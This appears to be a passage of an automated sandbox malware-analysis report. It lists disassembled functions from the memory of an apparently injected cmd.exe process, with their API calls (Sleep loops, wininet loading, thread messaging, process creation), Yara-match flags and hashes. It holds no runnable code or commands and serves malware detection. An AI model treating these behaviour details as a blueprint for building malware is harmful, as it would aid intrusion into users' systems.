                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f2fbed80490ca6755f0f514304d183c12c5f55831182a7873aec78eb221cf6dc
                                                                                        • Instruction ID: 58e83f6527b7cb9ecdd6f63fbc033f43e33b8f1e1a9529d39858b1f6be3214e8
                                                                                        • Opcode Fuzzy Hash: f2fbed80490ca6755f0f514304d183c12c5f55831182a7873aec78eb221cf6dc
                                                                                        • Instruction Fuzzy Hash: 5D90023220101802D500A59855086461005C7E1305F51D465B5018555ED77588957132
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ebe05ba4dc306ad97e43eff5e08789c6ad948c8bdf1fdfebd140989aa9a06ab5
                                                                                        • Instruction ID: 5d5f923b4f969c7fde11b1fa6310471ca402c251911881f6de09baae675c00b4
                                                                                        • Opcode Fuzzy Hash: ebe05ba4dc306ad97e43eff5e08789c6ad948c8bdf1fdfebd140989aa9a06ab5
                                                                                        • Instruction Fuzzy Hash: A9900262202014034505B1584514616500AC7E1205B51C475F1008590DD63588957126
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B229F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 33a8f5e86b3fadeae03bb0c671c37dded2c65bdc259e18c4803d8a13550e131e
                                                                                        • Instruction ID: 5f00a902361d79a7233b2abb461cb644300657a1ade6d6f8d3bfc0634884bdbd
                                                                                        • Opcode Fuzzy Hash: 33a8f5e86b3fadeae03bb0c671c37dded2c65bdc259e18c4803d8a13550e131e
                                                                                        • Instruction Fuzzy Hash: 98900437311014030505F55C07045071047C7D7355351C475F100D550CF731CC757133
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: abb25c92c9ba606d6c9ede3db4ca7ae750d02f5270e514b794cdc1053799740f
                                                                                        • Instruction ID: e9334cfbdb78100df455045fdd549e1305c5f0ba2dff74de2b43692f04b25fae
                                                                                        • Opcode Fuzzy Hash: abb25c92c9ba606d6c9ede3db4ca7ae750d02f5270e514b794cdc1053799740f
                                                                                        • Instruction Fuzzy Hash: 3990022221181442D600A5684D14B071005C7D1307F51C569B0148554CDA2588656522
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 48b3a2e2f9c8c569be4cd7332848895c048819043c2b58ed7bba2afc864eb149
                                                                                        • Instruction ID: 300c7430cb57de39e825d038d0c11d354df7f75d5081f3044e3affa974283aa5
                                                                                        • Opcode Fuzzy Hash: 48b3a2e2f9c8c569be4cd7332848895c048819043c2b58ed7bba2afc864eb149
                                                                                        • Instruction Fuzzy Hash: E590026234101842D500A1584514B061005C7E2305F51C469F1058554DD729CC567127
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 83985cff17d9cf342477ef4bfb2e4a6e573c6ca39c18b2c992a7588544c79805
                                                                                        • Instruction ID: f95c39a722cf2735fbdb67a8e58b55f1a1c5de21abd6f4f4c44f6ab497c0d454
                                                                                        • Opcode Fuzzy Hash: 83985cff17d9cf342477ef4bfb2e4a6e573c6ca39c18b2c992a7588544c79805
                                                                                        • Instruction Fuzzy Hash: 4990027220101802D540B15845047461005C7D1305F51C465B5058554ED7698DD97666
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d9ab495103db200adda2dd8c742ef0d37d156c688ef5e488c4b068f4ff7ad5c1
                                                                                        • Instruction ID: d39e6e5132d116e50c1758d846be8a18be6f1b6243cd3d86deba41f9b56f6519
                                                                                        • Opcode Fuzzy Hash: d9ab495103db200adda2dd8c742ef0d37d156c688ef5e488c4b068f4ff7ad5c1
                                                                                        • Instruction Fuzzy Hash: F890023220101813D511A15846047071009C7D1245F91C866B0418558DE7668956B122
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 16924db3fa4c809387bcf38c8a09c160ed306362f72dee108a00814f774efa0c
                                                                                        • Instruction ID: 4f6be083c224c75d54044b78cba4865ba5bce735daeb37f39183c9615eb6cfa3
                                                                                        • Opcode Fuzzy Hash: 16924db3fa4c809387bcf38c8a09c160ed306362f72dee108a00814f774efa0c
                                                                                        • Instruction Fuzzy Hash: 9A900222242055525945F15845045075006D7E1245791C466B1408950CD636985AE622
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f2f7b97df6a8dfe5deb521d88aa5a1944dbad808c498f31f86c88a9c25fa5e5b
                                                                                        • Instruction ID: 36b05157e02231e11977d1ceb254e7020d396d4d2ef7af77c2531cd0761bbedc
                                                                                        • Opcode Fuzzy Hash: f2f7b97df6a8dfe5deb521d88aa5a1944dbad808c498f31f86c88a9c25fa5e5b
                                                                                        • Instruction Fuzzy Hash: FA90022A21301402D580B158550860A1005C7D2206F91D869B0009558CDA25886D6322
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DE9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 358 2de9080-2de90c2 call 2debd40 362 2de919c-2de91a2 358->362 363 2de90c8-2de9118 call 2debe10 call 2ddacf0 call 2de4e50 358->363 370 2de9120-2de9131 Sleep 363->370 371 2de9196-2de919a 370->371 372 2de9133-2de9139 370->372 371->362 371->370 373 2de913b-2de9161 call 2de8ca0 372->373 374 2de9163-2de9184 call 2de8eb0 372->374 378 2de9189-2de918c 373->378 374->378 378->371
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02DE9128
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        • Opcode ID: 773cf48719143b680735ce92720d21be5deb55b7e76e1149e7fa19d1f8208055
                                                                                        • Instruction ID: 1dde4f4956ba89065b08fb72cb01cd02325665b521e1bea98269302cc676805d
                                                                                        • Opcode Fuzzy Hash: 773cf48719143b680735ce92720d21be5deb55b7e76e1149e7fa19d1f8208055
                                                                                        • Instruction Fuzzy Hash: 643181B2501645ABCB24EF64C885FA7B7B9FB48B00F00811DF62E5B345D630B950CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DE9076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 379 2de9076-2de9079 380 2de907b-2de9083 379->380 381 2de9086-2de90c2 call 2debd40 379->381 380->381 384 2de919c-2de91a2 381->384 385 2de90c8-2de9118 call 2debe10 call 2ddacf0 call 2de4e50 381->385 392 2de9120-2de9131 Sleep 385->392 393 2de9196-2de919a 392->393 394 2de9133-2de9139 392->394 393->384 393->392 395 2de913b-2de9161 call 2de8ca0 394->395 396 2de9163-2de9184 call 2de8eb0 394->396 400 2de9189-2de918c 395->400 396->400 400->393
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02DE9128
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        • Opcode ID: 1c5eb7067c7f5ddc64ef9fa350d2032238a3a8c733cec88538a8c0d8eca3709a
                                                                                        • Instruction ID: 6a0a5962b793293d02df67eaf159f32da0342304b678e2c841732399a1462500
                                                                                        • Opcode Fuzzy Hash: 1c5eb7067c7f5ddc64ef9fa350d2032238a3a8c733cec88538a8c0d8eca3709a
                                                                                        • Instruction Fuzzy Hash: FD31B4B1901305ABCB24EF64C885FABB7B5FF48B04F10801DEA2E6B345D774A950CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 407 2dea670-2dea6a1 call 2deaf60 RtlFreeHeap
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3AF8), ref: 02DEA69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction ID: 5b8356e3328efe4057f4dd3ea408ffccae246455c187cdd97e141b88681c2a9a
                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction Fuzzy Hash: A7E046B2200208ABDB18EF99CC48EA777ADEF88750F118558FE095B381C630F910CAF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 404 2dea662-2dea684 405 2dea68c-2dea6a1 RtlFreeHeap 404->405 406 2dea687 call 2deaf60 404->406 406->405
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DD3AF8), ref: 02DEA69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 476827b4cf0adb22f134cf2721237f9fb703a983405e57083bed56f01b049a5c
                                                                                        • Instruction ID: dfde9ce6d3245ec1fb644abe7982a11b2abde70b916c63a07e4c5d0720c8d9e9
                                                                                        • Opcode Fuzzy Hash: 476827b4cf0adb22f134cf2721237f9fb703a983405e57083bed56f01b049a5c
                                                                                        • Instruction Fuzzy Hash: EDE022B41003419BEB10FF65D4C04973798FF80304F10852EE84A87206C231E426CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DD8395 Relevance: 3.2, APIs: 2, Instructions: 168threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD836A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD838B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 3a87018189aa7727126bbfc1dae258c159bb975462db9604f3d88a515f174009
                                                                                        • Instruction ID: ad9fb644334ba20826e97c6ca5da5779cf6d937d81258a181c85f017ad8f0c18
                                                                                        • Opcode Fuzzy Hash: 3a87018189aa7727126bbfc1dae258c159bb975462db9604f3d88a515f174009
                                                                                        • Instruction Fuzzy Hash: DD519FB09016099FDB25EF64D885BEBB7A9EB48304F00456EE54AD7340DB70BE45CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DD8309 Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 460 2dd8309-2dd831f 461 2dd8328-2dd835a call 2deca00 call 2ddacf0 call 2de4e50 460->461 462 2dd8323 call 2debe60 460->462 469 2dd835c-2dd836e PostThreadMessageW 461->469 470 2dd838e-2dd8392 461->470 462->461 472 2dd838d 469->472 473 2dd8370-2dd838b call 2dda480 PostThreadMessageW 469->473 472->470 473->472
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD836A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD838B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 82a4f22693d0777877158902e0b70b062505104ebe88c647ff5ad4bd47728a58
                                                                                        • Instruction ID: d820ce4906e2c2fe7e5c49e48d9e25bf05a35bef58883ce2c519f24d92e94909
                                                                                        • Opcode Fuzzy Hash: 82a4f22693d0777877158902e0b70b062505104ebe88c647ff5ad4bd47728a58
                                                                                        • Instruction Fuzzy Hash: 4401B531A8122977EB21BA949C42FFE776D9B00F54F044119FF08FA2C1E7A4690646F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DD8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DD836A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DD838B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
                                                                                        • Instruction ID: 83d5126aaa1493bd983379a4c06fb29871d53cc4acd885ea97b1ab8ef411f0c9
                                                                                        • Opcode Fuzzy Hash: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
                                                                                        • Instruction Fuzzy Hash: 3301A731A8022877EB21B6949C42FBE776D9B40F50F044115FF08FA2C1E6947D0647F5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA6A4 Relevance: 1.6, APIs: 1, Instructions: 66processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DEA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: f48e9605061ef95c130ae55c5b7c429d3ed6ccf99ee4371b4655849f4f4d4fa8
                                                                                        • Instruction ID: 5607c6d4e26ce761ebadcdd65813782b6e3ba7896caa4a33b80cb82c54fd9b5e
                                                                                        • Opcode Fuzzy Hash: f48e9605061ef95c130ae55c5b7c429d3ed6ccf99ee4371b4655849f4f4d4fa8
                                                                                        • Instruction Fuzzy Hash: A31104B2200208AFDB14DF99CC84EEB7BA9EF8D754F158258BA0D97241C630E910CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DDACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DDAD62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                        • Instruction ID: 0bf3f72e5a5c003b3df1627e803bc6927a2bcb5807602a3b64422ecf2b9b7943
                                                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                        • Instruction Fuzzy Hash: EF011EB5D0020DABDF10EAA4DC41FDDB3799B54308F148595E90997240FA31EB14CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA6DD Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DEA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: c13e45fee7b1a59ebeacea8eaec14764a2d5ba402b7909eda1d38e70c04186c7
                                                                                        • Instruction ID: fe444b278a8d34936b48d41ea78c70d7b7b541c10053d01708792db3b53b9ea4
                                                                                        • Opcode Fuzzy Hash: c13e45fee7b1a59ebeacea8eaec14764a2d5ba402b7909eda1d38e70c04186c7
                                                                                        • Instruction Fuzzy Hash: 8201AFB2214108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97250D630E851CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DEA734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction ID: b29ffc8b5e5e21e59adb8c19675851903a3bc0de4a7946809bcfd6f3e0b83fa6
                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction Fuzzy Hash: BB01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DE91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DDF050,?,?,00000000), ref: 02DE91EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
                                                                                        • Instruction ID: 8488fface23e6e4c32c4204c64b11f8fb0332f7ac6774733d87cd38cbe0c5b32
